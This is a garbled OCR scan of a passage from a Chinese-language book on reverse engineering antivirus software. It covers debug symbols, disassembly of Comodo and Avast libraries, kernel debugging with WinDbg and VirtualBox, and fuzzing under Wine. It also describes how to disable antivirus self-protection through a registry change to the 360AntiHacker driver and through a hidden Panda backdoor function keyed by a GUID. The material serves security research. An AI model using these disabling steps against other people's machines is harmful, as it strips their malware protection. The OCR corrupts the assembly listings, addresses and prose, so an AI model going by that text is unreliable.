0.90 10078880 sub 1007888D 3788 F72DB1D0 _zN11FssisedFile6uninitEb 

0,90 1009880 sub 1009880 4540 F7288C34 -Zi2bzipReadFileiPvmPm 

0.91 10091E1A sub 10091E1A 4367 F7345DA8 sub F7345DA8 5032 

0.91 10004430 sub 10004430 84 F72C0E34 MIMEGetUnCompressedsize 

0.90 10045798 — mtinitlocks F7283950 ZNSRarVMIéIsStandardFilterEPhi 

0.91 10040823 — IsExceptionObjectToBeDestroyed F73400F8 sub F73400F8 4981 

0.90 10016970 sub 10016970 306 F72C9A34 dbxTelFile 

0.91 10084663 sub 100846E3 4048 F7283A18 -ZNSRarM2tFilterItanium SetBitsEPhji 

0,90 10090210 sub. 1009D210 4578 F72E7760 -ZNZONsisDecoderContainer&IsZIbEPKh 

0.90 100388A0 sub 100388A0 1314 F72B996C -ZNI 1 CRarDecoder13WriteCallbackEPvPhm 














图 2-3 ”将 调试 符号 从 Linux 导 出 到 Windows 
图 2-4 展 示 了 借助 完整 的 调试 符号 ， 道 向 分 析 Comodo Antivirus 中 一 个 库 的 部 分 代码 。 












































[E] mavewa E| Œ Pseudecede [3 | ©) Hexvewl E| A Structures O| EDO enms O| mpets O| ees O| 

text: 00000000000058E0 

text.00000000000058E8 Attribute tati 

text: 88999969899958E8 

text.09800099900058E8 ; char * cdecl CSecKktt: ;StrCpyA(CSeckKtt "const this, char *aDestStrtng，stze_t DestSize, const char *aSrcString) 
text.00000000000058E0 public | ZN7CSecKit7StrCpyAEPcmPKc 

text :96999966666958E6  ZN7CSecKit7StrCDyAEPcnPKc proc near DATA XREF: got plt:o 
text-0099966660658E6 

text.000000000009058E0 S = qword ptr -48h 

text. 00000000800858E6 = qword ptr 

text:00000000000058E0 = qword ptr - 

text: 00000000000058E0 = qword ptr 

text: 00000000000058E0 

text:00000000000058E9 this = rdi ; CSecKit *const 
text.00000000000858E8 aDestString = rsi ; char * 
text.00000000000058E0 DestSize rdx ; size t 
text-00900660000058E0 aSrcString = rcx | const char * 
text:00000000000058E0 push rbp 

text: 00000000000058E1 mov r8, DestSize 

text.00000000000058E4 mov rbp, aDestString 

text :68899689899958E7 mov — r9, aSrestring 

text.080000000000058EA push rbx 

text.00000000000058EB mov rbx, this 

text.99999999999058EE sub rsp, 38h 

text.00000000000058F2 cnp byte ptr [this«98h], © 
text.600000000000058F9 jnz short loc 595A 

text.00000000000058FB aDestString = rbp 

text 80966660600058FB DestSize = r8 ; 

text.00000000000858FB aSrcString = r9 const char * 
text:00000000000958FB mov rsi, [this«8] 

text:00000000000058FF lea rcx, [rsp+48h+SrcLength] ; pLength 
text: 0000000000005904 mov rdx, aSrcString aString 
text:0000000000005907 mov [rsp+48h+DestSize], DestSize 
text:000000000000590C mov [rsp+48h+pSrc], aSrcString 
text:0000000000005911 mov [rsp+48h+SrcLength], 6 

text: 000000000000591A call __ZN7CSecKitt15StrLenInternaLAEP7IMenMgrPKcPm CSecKit enMgr *,char ulong * 
text.8000000000008591F this = rbx ; CSecKit *const 
assay [SUGUGOUGUUBUSRET: CSScKIErrSEFORVA har F; ulong, char coast TIT 

la J 

















图 2-4 ”借助 完整 的 调试 符号 ， 道 向 分 析 Comodo Linux 版 本 的 libPE32.so 库 


于 某 些 原因 ， 在 操作 系统 间 导 出 调试 符号 并 不 是 百分之百 可 靠 的 。 比 如 ， 针 对 Windows、 
Linux、BSD 和 Mac OSX 的 编译 器 是 不 同 的。 在 类 Unix 系 统 平 台 上 ，GCC ( 有 时 是 Clang ) 是 使 用 
最 普遍 的 编译 器 ; 但 在 Windows 平 台 上 ， 则 要 使 用 微软 开发 的 编译 器 。 这 就 意味 着 ， 在 不 同 的 系 
统 平台 上 ， 即 使 是 相同 的 C 或 C++ 代码 ， 生 成 的 汇编 代码 也 是 不 同 的 ， 这 也 让 比 对 内 部 函数 和 导 
出 调试 符号 的 工作 变 得 更 难 。 在 其 他 一 些 技 术 中 , 还 有 另外 一 些 导 出 调试 符号 的 工具 ， 比 如 本 书 
的 作者 之 一 Joxean Koret 编 写 的 开源 的 IDA 插 件 Diaphora， 通过 使 用 Hex-Rays 反 汇编 生成 的 抽象 语 
法 树 ( Abstract Syntax Tree, AST ) 来 进行 函数 图 像 比 对 。 
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2.2 调试 技巧 


前 面 几 节 仅 介绍 了 通过 静态 分 析 技术 , 从 你 要 逆向 分 析 的 反 病 毒 产 品 中 获取 有 用 的 信息 。 本 
节 将 介绍 如 何 通 过 动态 分 析 技 术 逆向 分 析 你 选择 的 反 病 毒 产 品 。 

和 恶意 软件 一 样 ， 反 病毒 产品 通常 也 会 采取 措施 ,阻止 被 着 向 分 析 。 反 病毒 产品 的 可 执行 模 
块 是 可 以 被 混淆 的 ， 有 时 甚至 会 针对 每 一 个 二 进 制 文 件 应 用 不 同 的 混淆 处 理 手段 ( 反 病 毒 软件 
Avira 的 内 核 就 是 一 个 案例 )。 反 病毒 软件 会 采用 反 调 试 手段 ， 为 研究 者 了 解 恶 意 软 件 侦 测算 法 的 
原理 设置 障碍 。 这 类 反 调 试 技巧 使 调试 反 病 毒 软件 的 模块 变 得 更 有 难度 ,从 而 难以 了 解 它们 是 如 
何 侦 测 恶意 软件 的 , 或 攻击 者 是 如 何 利用 反 病 毒 软件 中 解析 器 的 bug 来 控制 程序 执行 恶意 代码 的 。 
后 续 几 节 将 为 你 提供 调试 反 病毒 软件 的 相关 建议 。 所 有 调试 建议 和 技巧 仅 针对 Windows 平 台 
下 的 产品 ， 因 为 据 观察 ， 没 有 反 病 毒 软件 会 在 Linux、FreeBDS 和 Mac OS X 上 应 用 反 调 试 技术 。 


后 门 和 配置 设置 


尽管 反 病毒 产品 通常 会 阻止 你 将 相关 工具 注入 到 其 服务 进程 上 展开 调试 , ASIE, 如 果 你 采用 
道 向 分 析 技 术 , 绕 过 反 调试 保护 并 不 困难 。 这 些 自 我 保护 机 制 ( 反 病 毒 公司 是 这 么 命名 的 ) 通常 
旨 在 防止 恶意 软件 注入 到 反 病 毒 软件 的 服务 进程 中 , 在 反 病 毒 软件 的 进程 下 创建 一 个 子 线程 , 或 
者 阻止 防护 进程 被 强制 结束 〈 这 是 恶意 软件 经 常 干 的 事 )。 这 些 措施 并 不 是 要 阻止 用 户 为 了 调试 
反 病 毒 软件 或 其 他 任何 操作 ， 而 禁用 其 相关 服务 。 事 实 上 ， 要 阻止 用 户 禁 用 Cox) 反 病毒 软 
件 毫 无 意义 。 

除非 反 病 毒 产品 已 经 携带 命令 行 分 析 扫描 器 〈 比如 Avira 扫描 需 或 karus 13 扫 描 器 )， 否 则 禁 
用 产品 的 自我 保护 机 制 是 使 用 调试 工具 开展 动态 分 析 工 作 的 第 一 步 , 命 令 行 扫描 器 通常 不 会 带 有 
自我 保护 功能 ， 因 为 它们 并 非常 驻 进程 ， 而 是 由 用 户 按 需 、 手 动 开 启 工 作 的 。 

通常 情况 下 , 在 官方 产品 帮助 文档 中 , 并 不 会 涉及 如 何 禁 用 反 病 毒 软 件 的 自我 保护 机 制 。 这 
是 因为 反 病 毒 公 司 认为 ， 此 类 信息 只 有 支持 和 开发 人 员 会 用 到 : 当 用 户 报 告 了 一 个 问题 以 后 , 他 
们 需要 调试 相关 服务 和 进程 , 来 定位 问题 产生 的 原因 。 此 外 , 考虑 到 恶意 软件 开发 者 可 能 会 利用 
公开 的 相关 信息 ， 攻 击 装 有 反 病 毒 产品 的 计算 机 ， 所 以 不 会 将 此 类 信息 公之于众 。 通 常情 况 下 ， 
只 要 修改 某 一 条 注册 表单 元 中 的 注册 表 键 ， 你 就 可 以 调试 反 病毒 产品 的 相关 服务 了 。 

与 旧版 本 的 Panda Global Protection 反 病毒 软件 的 例子 类 似 ， 有 时 借助 一 个 程序 员 预 留 的 后 
门 ， 可 以 暂时 禁用 反 病 毒 软 件 的 自我 保护 机 制 。Panda 反 病毒 软件 有 一 个 名 叫 pavshld.dll ( Panda 
反 病 毒 防 护 盾 ) 的 动态 链接 库 中 ， 输 出 了 一 个 只 接受 唯一 参数 的 函数 : 一 个 秘密 的 GUID 383i 
传人 这 个 GUID 参 数 ， 可 以 禁用 该 反 病 毒 软件 。 尽 管 没 有 可 以 调用 该 函数 的 现成 工具 ， 你 还 是 可 
以 轻松 编写 一 个 工具 来 加 载 这 个 动态 链接 库 , 然后 使 用 GUID 调 用 这 个 函数 ,以 禁用 Panda 反 病毒 
软件 的 防护 盾 。 接 下 来 就 可 以 使 用 OllyDbg、IDA 或 者 你 中 意 的 其 他 调试 工具 开展 动态 分 析 了 。 
第 14 章 将 会 深入 讨论 Panda 反 病毒 软件 中 的 这 个 漏洞 。 

反 病 毒 软件 可 以 在 用 户 层 通过 hook 特 定 的 函数 并 采用 反 调 试 技巧 , 来 实现 自我 保护 功能 。 在 
内 核 层 , 通过 加 载 设备 驱动 , 可 以 达到 同样 的 效果 。 如今, 反 病 毒 软件 通常 会 通过 使 用 内 核 驱动 ， 
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实现 自我 保护 功能 ， 这 无 疑 是 正确 的 做 法 。 出 于 多 种 原因 , 仅 依靠 在 用 户 层 使 用 hook 技 术 实现 自 
我 保护 是 一 个 糟糕 的 决定 。 一 个 最 简单 的 原因 是 , 用 户 层 的 其 他 进程 可 以 轻松 将 反 病 毒 软 件 设 下 
的 hook 移 除 ， 详 见 第 9 章 的 内 容 。 

如 果 反 病毒 软件 的 内 核 驱动 只 是 为 了 防止 产品 被 禁用 , 那么 只 要 禁止 相关 内 核 驱动 加 载 , 就 
可 以 轻松 禁用 反 病 毒 软件 的 自我 保护 功能 。 

要 想 在 Windows 平 台 上 禁用 内 核 驱 动 或 系统 服务 ， 只 要 打开 注册 表 编 辑 器 ( regedit.exe )， 然 
后 转 到 HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services， REII RE m 
装 的 驱动 ， 并 修改 对 应 的 注册 表 值 。 比 如 ， 你 想 禁 用 中 国 的 反 病 毒 软件 一 一 360 安 全 卫士 的 自我 
保护 功能 (官方 称 作 “ 反 黑客 功能 ”)。 你 需要 将 360 反 黑客 驱动 (360AntiHacker.sys ) 的 初始 值 更 
改 为 4( 即 常量 SERVICE_DISABLED ， 人 参见 图 2-$ )。 通 过 更 改 服务 的 初始 值 ， 可 以 让 Windows 不 
加 载 相关 驱动 ， 从 而 禁用 反 病 毒 软件 的 自我 保护 功能 。 不过， 更 改过 注册 表 值 以 后 ,你 需要 重新 
启动 计算 机 。 
























































eg dito 
File Edit View Favorites Help 
J HKEY LOCAL MACHINE 





D 







Data 











J} ecpoooooooo (value not set) 
j|. HARDWARE REG SZ 3605afe Anti Hacker Service 
j sam REG DWORD 0x00000000 (0) 
js SECURITY REG SZ System32lDriversl36DAntiHacker. sys 
此 SOFTWARE REG DWORD 0x00000001 (1) 
日 Bn REG DWORD 0x00000000 (0) 
m 
pues e ne 
B-d CurrentControlSet = 
旧 Control 
i Enum 
L Hordnare Profles zi 
|; Policies 
B-d services Value name: 
BNET CLR Data [stat 
Jo. .NET CLR Networking 
Jo. NET CLR Networking 4.0.0.0 Value data: Base 
|. .NET Data Provider for Oracle [4 f$. Hexadecimal 
用 ,NET Data Provider for SalServi T | 
ÍL ,NET Memory Cache 4.0 
Js. .NETFramework. 
Ji ACEBAFEDE-3F11-4A9B-8993-8 ema | 
|; 1394ohci 
日 上 S60AntiHacker 
上 Enum 
; 360AvFI 
360Box 
360Camera 


H-A 


, 3605elfProtection 


AcpiPmi 
adp94xx 
adpahci 
adpu320 
adsi 
AeLookupSvc 


agp440 
aic78xx 
j ALG 


图 ` 田 -图 - 田 - 田 -田力 - 田 











|Computer\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\services\360AntiHacker 

图 2-5 ”禁用 360 反 黑客 驱动 的 操作 截图 
值得 一 提 的 是 ， 反 病毒 软件 很 有 可 能 会 通过 弹出 “拒绝 访问 ”的 错误 消息 窗口 或 其 他 没有 意 

义 的 提示 , 来 阻止 你 禁用 驱动 。 在 这 种 情况 下 ， 你 只 需要 重启 电脑 ， 进 入 安全 模式 禁用 驱动 ， 然 

后 再 次 重启 进入 正常 的 系统 模式 即 可 。 
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一 些 反 病毒 产品 的 自我 保护 功能 包含 在 实现 全 部 核心 功能 的 驱动 中 。 在 这 种 情况 下 , 如 果 禁 
用 了 驱动 ,会 直接 导致 反 病 毒 软件 无 法 正常 工作 ,因为 其 余 更 高 级 别 的 模块 需要 同 该 驱动 有 交互 。 
这 时 你 只 有 一 个 选择 : 内核 调 试 。 

1. 内 核 调试 

本 节 聚 焦 于 如 何 使 用 内 核 调试 工 具 , 调试 反 病 毒 软件 驱动 和 用 户 态 进 程 。 借 助 调试 工具 进行 
内 核 调试 是 最 不 费力 的 一 种 手段 , 因为 该 过 程 避 开 了 反 病 毒 软 件 在 用 户 态 下 采用 的 各 类 反 调 试 手 
段 。 你 将 调试 整个 操作 系统 ,并 在 必要 的 时 候 调 试用 户 层 相应 的 进程 ， 而 不 是 通过 禁用 反 病 毒 软 
件 的 自我 保护 驱动 开展 相关 分 析 。 内 核 调试 需要 使 用 针对 Windows 软 件 包 或 WDK ( Windows 
Driver Kit) 开发 的 调试 工具 中 的 一 个 ( WinDbg 或 Kd )。 


£] WinDbg:6.3.9600.17200 X86 


Fle Edt View Debug Window Hel 


p 
[CEN 









































ixl 
NET | use |1394 Local |coM | 
Kernel debugging of the local machine. 




















图 2-6 调试 软件 WinDbg 


要 展开 内 核 调试 , 你 需要 用 付费 版 的 VMware 或 开源 的 VirtualBox 搭 建 一 台 虚 拟 机 。 本 书 中 使 
用 的 软件 是 VirtualBox， 因 为 它 是 免费 的 。 

搭建 完 Windows 7 或 之 后 版 本 的 Windows 虚 拟 机 后 ， 你 需要 配置 操作 系统 的 引导 选项 ， 以 便 
开展 内 核 调试 。 在 旧版 本 的 Windows 系 统 中 ( 如 Windows XP、Windows 2000 等 )， 可 以 通过 修改 
ci\boot.ini 文 件 完成 相关 操作 ; 但 从 Windows Vista 开 始 ， 则 必须 使 用 系统 启动 菜单 编辑 器 
(bcdedit )。 你 需要 先 以 管理 员 权 限 打开 一 个 命令 提示 符 ( cmd.exe )， 然 后 执行 下 面 两 条 指令 : 


$ bcdedit /debug on 
$ bcdedit /dbgsettings serial debugport:1 baudrate:115200 
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KIJ 
相应 


第 一 条 命令 为 当前 系统 启 





用 了 内 核 调 试 , 第 二 条 命令 














并 以 115 200 波 特 率 ( baud-rate ) 品行 通信 (参见 图 2-7 )。 

















将 全 局 调试 配置 调整 为 : 使 用 端口 CoM1 





[cs Administrator: C Win: 


debugt ype 





idows'System32'cmd.exe 


C:\Windows\system32>bcdedit /debug on 
The operation completed successfully. 


C:NMindous*Nsustem325bcdedit /dbgsettings 


115280 


The operation completed successfully. 


C:\WWindowsNsystem32> 


C:\Windows\system32>bcdedit /dbgsettings serial debugport:1 baudrate:115200 
The operation completed successfully. 











图 2-7 





(1) 右键 单 击 虚拟 机 ， 

















使 用 bcqedit 在 Windows 7 系统 上 配置 内 核 调试 


成 功 为 当前 虚拟 机 系统 配置 调试 功能 后 ， 你 需要 关闭 当前 虚拟 机 ， 在 VirtualBox 相 关 配 置 中 
完成 剩余 的 配置 步骤 。 


















































选择 Settings， 然 后 在 弹出 的 对 话 框 中 ， 单 击 左 侧 的 Serial Ports. 





(2) 勾 选 Enable Serial 选 项 , 端口 号 选择 COM1 , 接着 在 Port mode 下 拉 菜 单 中 选择 Host Pipe 选 项 
， 接 着 在 Port/File Path 栏 填 人 \,\pipe\com 1 ( 如 图 2-8 所 示 )。 





(3) 勾 选 Create Pipe 选 项 








General 


System 








Display 





Storage 
Audio 


Network 


> c5 «v &J (s) E) [I8 


Serial Ports 





USB 


Bv 


Shared Folders 





Serial Ports 


Portl | Port2 
vV! Enable Serial Port 
Port Number: | COMI v | IRQ: 
Port Mode: Host Pipe v 
W Create Pipe 


Port/Hle Path: | V. Ypipecom 1 


4 | VO Port |0x3F8 














告 成 ! 现在 你 不 仅 可 以 j 
反 病 毒 软件 的 自我 保护 


图 2-8 配置 VirutalBox 的 调试 选项 


(4) 正确 完成 前 面 三 个 步骤 后 ， 重 启 虚拟 机 ， 然 后 进入 描述 为 Debugger Enabled 的 操作 系统 。 





周 试 内 核 驱动 ， 还 可 以 调试 月 


HS PRIMA 








功能 妨碍 调试 了 。 





程序， 而 且 再 也 不 月 


担心 
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HER ”上述 步骤 的 前 提 是 在 Windows 主 机 平台 上 的 VirtualBox 内 运行 。 在 Linux 或 Mac OS X 平 台 
上 开展 针 上 述 对 Windows 平 台 的 内 核 调 斌 会 比较 麻烦 ， 因 为 你 至 少 需 要 两 台 虚 拟 机 ， 而 
且 与 主机 的 操作 系统 版 本 紧密 相关 。 尽 管 你 可 以 在 Linux 或 Mac OSX 主 机 系统 内 同时 安装 
VMWare 和 VirtualBox ， 但 这 是 一 件 相 当 困 难 的 事情 。 因 此 ， 建 议 有 可 能 的 话 ， 还 是 在 装 
有 Windows 的 主机 内 开展 内 核 调 试 。 


2. 使 用 内 核 态 调试 工具 调试 用 户 态 下 的 进程 

使 用 内 核 态 调试 工具 来 调试 用 户 态 下 的 进程 完全 可 行 。 不过, 为 了 实现 这 样 的 效果 ,你 需要 
打开 内 核 调 试 工具 C 如 WinDbg ), 输入 相关 指令 ， 计 调试 工具 从 当前 的 运行 环境 切换 到 目标 进程 
的 运行 环境 中 去 。 

具体 步骤 如 下 。 

(1) 以 管理 员 权 限 打 开 WinDbg， 然 后 在 主 菜 单 按 File — Kernel Debug 顺序 选择 。 

(2) 在 对 话 框 中 ， 进 入 COM 标 签 ， 然 后 输入 之 前 设置 的 Port 或 File 值 。 接 着 ， 点 击 Pipe 选 项 。 

(3) 配置 WinDbg， 使 其 从 Windows 符 号 服务 器 上 下 载 调 试 符号 ， 接 着 通过 下 列 指令 重新 加 载 


符号 : 














.Sympath srv*http://msdl.microsoft.com/download/symbols 
.reload 


当 你 设置 完 符号 路 径 后 ，WinDbg 就 可 以 借助 公共 调试 符号 开展 调试 了 。 

接 下 来 我 们 将 以 F-Secure 反 病毒 软件 Windows 零 售 版 为 例 ， 针 对 其 用 户 态 下 的 反 病 毒 服务 
F-Secure Scanner Manager 32-bit ( fssm32.exe ) 展开 调试 。 要 想 通 过 WinDbg 在 内 核 态 开展 相关 工 
TE, 需要 先 列 出 调试 主机 上 的 所 有 进程 ， 找 到 调试 目标 进程 ,切换 当前 执行 环境 ,然后 开展 调试 
工作 。 

可 以 通过 以 下 指令 ， 列 出 从 用 户 态 到 内 核 态 的 所 有 进程 : 

> !process 0 0 

你 可 以 通过 在 指令 末尾 追加 进程 名 进行 过 滤 ， 使 得 命令 提示 符 中 只 显示 该 进程 的 相关 结果 ， 
示例 如 下 : 

> !process 0 0 fssm32.exe 

PROCESS 868c07a0 SessionId: 0 Cid: 0880 Peb: 7ffdf000 \ 

ParentCid: 06bc 


DirBase: 62bb7000 ObjectTable: a218da58 HandleCount: 259. 
Image: fssm32.exe 


从 上 面 现 实 的 结果 可 以 发 现 ， 输 出 字符 串 868co7a0 指 向 了 一 个 EBPROCESS 结 构 体 。 将 
EPROCESS 的 地 址 带 和 人 下列 指 令 : 

.process /r /p 868c07a0. 

通过 运行 指令 , 确定 修正 符 /r /p, 之 后 运行 环境 会 自动 在 内 核 态 和 用 户 态 之 间 切 换 。 现在 ， 
你 就 可 以 开始 调试 fgsm32.exe 了 : 
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lkd> .process /r /p 


868c07a0 


Implicit process is now 868c07a0 


Loading User Symbols 


执行 环境 切换 以 后 ， 你 就 可 以 通过 lm 指令 列 出 用 户 态 下 进程 加 载 的 所 有 库 了 ， 如 下 : 





lkd» 1m 

start end 
00400000 00531000 
00680000 006ec000 
00700000 007005000 
00750000 00771000 
007050000 007cc000 
00de0000 00e748000 
01080000 01082000 
01e60000 01e76000 
02520000 02039000 
07£20000 07f56000 
0dc60000 0dc98000 
0dce0000 0d320000 
10000000 10008000 
14140000 14469000 
171c0000 17209000 
174560000 174c4000 
17840000 17aad000 
17ca0000 1801e000 
20000000 20034000 
21000000 2101e000 
emn) 


module name 


fssm32 (deferred) 

fs ccf id converter32 (deferred) 
profapi (deferred) 
json c (deferred) 
bdcore (deferred) 
fshive2 (deferred) 
fpiaqu (deferred) 
fsgem (deferred) 
sechost (deferred) 
daas2 (deferred) 
fsuss (deferred) 
KERNELBASE (deferred) 
hashlib x86 (deferred) 
fsgeme (deferred) 
fsclm (deferred) 
orspapi (deferred) 
fsusscr (deferred) 
fsecr32 (deferred) 
fsas (deferred) 
fsepx32 (deferred) 








现在 你 可 以 在 内 核 态 下 调试 用 户 态 的 进程 了 。 如 果 想 要 了 解 更 多 关于 WinDbg 的 调试 技巧 ， 
强烈 建议 你 读 一 读 《逆向 工程 实战 》 的 第 4 章 。 

3. 使 用 命令 行 工具 分 析 反 病毒 软件 

有 时 你 会 幸运 地 发 现 , 反 病毒 软件 自 带 命令 行 工具 。 在 这 种 情况 下 ,你 不 需要 通过 反 病毒 软 
件 来 禁用 自我 保护 机 制 或 开展 内 核 调试 。 你 可 以 使 用 任何 得 心 应 手 的 调试 工具 , 动态 分 析 反 病毒 
产品 的 内 核 。 有 不 少 Windows 版 本 的 反 病毒 软件 提供 类 似 的 命令 行 工 具 C 如 Avira 和 Ikarus ) 不 过 
也 有 一 些 Windows 版 的 反 病毒 软件 ， 因 为 厂商 移 除了 这 项 特性 或 者 因为 命令 行 工 具 只 能 被 工程 师 
或 服务 支持 人 员 使 用 ， 而 不 提供 独立 的 命令 行 工 具 。 在 这 种 情况 下 ,你 可 以 查看 一 下 该 款 反 病毒 
软件 在 别 的 系统 平台 上 有 没有 相关 产品 。 如 果 该 款 反 病毒 软件 有 Linux、BSD 或 Mac OS X 版 本 的 
Wi, 有 可 能 这 些 版 本 提供 了 可 供 你 调试 




















的 独立 的 自 带 命令 行 工具 。Avira 、Bitdefender 、Comodo、 





F-Secure 、Sophos 以 及 其 他 许多 反 病 毒 软件 都 是 这 样 。 





调试 命令 行 工 具 并 不 意味 着 ,你 一 直 要 用 类 似 WinDbg、IDA、OllyDbg 或 GDB 调 试 工具 开展 
调试 。 你 也 可 以 借助 调试 接口 ， 编 写 模糊 测试 工具 ( Fuzzer ), 例如 LDB binding, Vtrace debugger 
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( 由 Kenshoto 开 发 ) 或 PyDbg 和 WinAppDbg Python API, 


提示 “模糊 测试 工具 用 来 向 目标 程序 传 入 无 效 或 意外 的 输入 数据 。 根 据 目 标 程序 的 不 同 ， 模 糊 
测试 输入 数据 也 有 所 不 同 。 上 比如， 在 针对 反 病 毒 软件 做 模糊 测试 时 ， 使 用 的 就 是 修改 过 
的 或 不 完整 的 病毒 样本 。 使 用 模糊 测试 工具 的 目的 也 各 有 不 同 ， 如 发 现 软件 bug 或 漏洞 ， 
发 现 软件 针对 传 入 数据 的 不 同 处 理 方式 ， 等 等 。 编 写 模糊 测试 工具 ， 就 是 要 编写 自动 化 
输入 数据 修改 工具 ， 并 将 数据 传递 给 目标 程序 。 一 般 来 说 ， 模 糊 测 试 工 具 要 想 发 现 有 价 
值 的 bug， 需 要 经 过 成 百 上 千 次 畸形 输入 数据 的 测试 ( 即 修 改过 的 输入 数据 )。 


2.3 ”移植 内 核 


本 节 讨 论 如 何 挑选 自动 化 平台 和 工具 。 为 自动 化 测试 挑选 合适 的 操作 系统 , 以 及 从 反 病 毒 软 
件 中 提取 正确 的 工具 ， 能 够 让 你 在 逆向 分 析 和 自动 化 测试 过 程 中 事半功倍。 

要 想 实 现 基本 自动 化 或 自动 化 模糊 测试 ， 最 好 选用 类 Unix 的 操作 系统 ， 尤 其 推荐 Linux。 这 
是 因为 Linux 系 统 占用 更 小 的 内 存 和 硬盘 空间 ， 而 且 为 自动 化 相关 任务 提供 了 许多 工具 。 通 常 ， 
使 用 QEMU KVM, 、VirtualBox 或 VMware 搭建 Linux 虚 拟 机 要 比 搭建 Windows 虚 拟 机 更 容易 一 些 。 
因此 ， 建 议 你 在 Linux 平 台 上 开展 针对 反 病 毒 软 件 的 自动 化 测试 。 和 其 他 普通 软件 一 样 ， 反 病毒 
软件 厂商 通常 会 把 软件 目标 兼容 平台 设 定 为 流行 的 操作 系统 ， 比 如 Windows。 如 果 反 病毒 产品 没 
有 Linux 版 本 ， 只 有 Windows 版 本 的 话 ， 还 是 可 以 通过 Wine ( 其 本 身 不 是 一 款 模 拟 器 ) TURA 
接近 本 机 语言 的 运行 速度 运行 反 病毒 扫描 絮 。 

众所周知 ，Wine 软 件 可 用 于 在 非 Windows 操 作 系统 中 C 如 Linux ) 运行 Windows 平 台 上 的 二 进 
制 文件 。 另 一 方面 ，Winelib ( Wine 的 支持 库 ) 可 以 将 只 兼容 Windows 系 统 的 应 用 移植 到 Linux 系 
统 中 去 。 使 用 Winelib 成 功 移植 到 Linux 平 台 的 应 用 案例 有 Picasa 《〈 谷歌 开发 的 一 款 数码 图 片 编辑 
和 查看 工具 )、 Kylix (Borland 开发 的 一 款 编译 器 和 继承 开发 环境 ， 之 后 不 再 继续 更 新 )、 Corel 
开发 的 WordPerfect9 Linux 版 和 IBM 公 司 开发 的 WebSphere。Wine 或 Winelib 的 工作 原理 是 ,运行 只 
兼容 Windows 平 台 的 命令 行 工具 , 借助 Wine 或 逆向 分 析 核 心 库 , 为 Linux 编 写 一 个 C/C++ 的 封装 程 
序 。 借 助 Winelib 调 用 只 兼容 Windows 的 动态 链接 库 (DLL 文件 ) 导出 的 函数 。 

上 面 介绍 的 两 种 办 法 都 可 以 帮助 开展 自动 化 测试 。 比 如 ， 只 兼容 Windows 平 台 的 命令 行 工具 
Ikarus t3 Scan ( 如 图 2-9 所 示 ) 以 及 Microsoft Security Essentials 反 病毒 电脑 软件 使 用 的 mpengine.dll 
库 〈 仅 兼容 Windows 平 台 )。 在 没有 别 的 办 法 让 目标 反 病 毒 产品 自动 化 运行 在 Linux 平 台 上 时 ， 建 
议 使 用 Wine 模 拟 嚣 ， 因 为 在 Windows 下 开展 自动 化 测试 ， 十 分 复杂 而 且 耗 费 系统 资源 。 
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pnm————— exe Oa.zip Ob.zip Oc.zip - 0 X 


c3éalf309e29 


cléc1l112799bfb357ab514 


92fa0:1l 
cll1490bffeÜ 





图 2-9 ”借助 Wine 在 Linux 平 台 上 运行 I[karus t3 Scan 





2.4 实战 案例 : 为 Linux 版 Avast 编写 Python binding 


本 节 将 为 你 介绍 一 个 实战 案例 , 通过 逆向 分 析 反 病毒 软件 的 相关 模块 来 编写 binding。 简 而 言 
Z, 这 里 的 binding 指 的 是 为 你 的 模糊 测试 工具 编写 舱 入 式 工 具 或 库 。 如 果 你 可 以 使 用 自己 编写 的 
TARE ( 而 不 是 反 病 毒 三 商 提供 的 工具 ) 与 反 病 毒 软件 内 核 交 互 ， 那么 在 接 下 来 的 工作 中 ,你 
就 可 以 实现 自动 化 了 ( 比如 编写 你 自己 的 扫描 器 或 模糊 测试 工具 )。 本 案例 将 以 Avast Linux 版 作 
为 研究 目标 ， 选 用 Python 作为 实现 自动 化 的 编程 语言 。 之 所 以 选用 Avast Linux 版 作为 研究 目标 ， 
是 因为 该 版 本 易于 逆向 分 析 ， 编 写 针 对 它 的 binding 只 需要 1~2 小 时 。 
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2.4.1 Linux 版 Avast 简介 














n 





Linux 版 Avast 只 有 两 个 可 执行 组 成 部 分 : avast 和 scan。 第 一 个 负责 解压 病毒 特征 数据 库 文 
ft (VPS 文 件 )、 发 起 扫描 任务 、 查 询 URL， 等 等 。 第 二 个 则 是 执行 这 些 查询 的 客户 端 工具 。 顺 
便 说 一 下 ， 这 些 分 布 式 二 进 制 文件 包含 部 分 调试 符号 ， 如 图 2-10 所 示 。 
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[F] Functions window ns x | IDAViewA 0 ] Pseudocode-A | | | [&) Loa 
IINE l| El 





deregister tm clones 
register tm clones 

do global dtors aux 
frame dummy 
stringcmp 
stringcasecmp 





scan path proc near 








name= dword ptr -103Ch 

resolved- dword ptr -1038h 
n= dword ptr -1034h 
var 1030- dword ptr 











-1030h 


















































edi, edx 
esp+103Ch+var_C], esi 
esp+103Ch+var_4], ebp 


parse_response 








[f] 

[f] 

[f] 

[f] 

四 

[f] 

[f] 

a mn var 182C- dword ptr -182Ch 

— Mn . var. 1028- dword ptr -1028h 

加 | stringstring var 1024- dword ptr -1824h 

$| trim var 1820- dword ptr -1020h 

因 usage var 181C- byte ptr -101Ch 

因 add slashes var 10- dword ptr -18h 

[F] next token var C- dword ptr -GCh 

[f] data var 8- dword ptr -8 

[7] Adia var_4= dword ptr -4 

A ; 

Lf] enc. print esp, 103Ch 

Lf] std. print espri03Cheresolved], 0 ; resolved 
[fij error esp-183Ch-name], edx ; name 
f| compare esp-i03Che-var 10], ebx 
[f] response ebx, eax 

[F] print error espri03Chevar 8], edi 
A 

A 


narse data resnonse 





esp-1803Chevar 1982C], 
esp«103Chevar 1028], 
esp-183Ch-var, 1024], 
espri03Chevar 19020], 
.realpath 

eax, eax 

loc 804A840 


| | 
(160, -8) [(645, 360) [00001F00 


Line 54 of 111 








dig Graph overview 











100.00% 








08049F00: scan path 


offset storage 
1000h 

9 

9 








图 2-10 Avast scan 工 具 的 函数 列表 与 针对 scan_path 函 数 的 反 汇 编 界面 


多 亏 有 了 部 分 调试 符号 ， 你 可 以 开始 用 IDA 分 析 文 件 ， 并 且 很 容易 地 了 解 程序 的 行为 。 让 我 


们 从 main 孙 数 开始 : 











.text:08048930 ; int | cdecl main(int argc, const char **ar 
const char **envp) 

.text:08048930 public main 

.text:08048930 main proc near ; DATA XREF: sta 
.text:08048930 

.text:08048930 argc = dword ptr 8 
.text:08048930 argv = dword ptr  OCh 
.text:08048930 envp = dword ptr 10h 
.text:08048930 

.text:08048930 push ebp 

.text:08048931 mov ebp, esp 

.text:08048933 push edi 

.text:08048934 push esi 

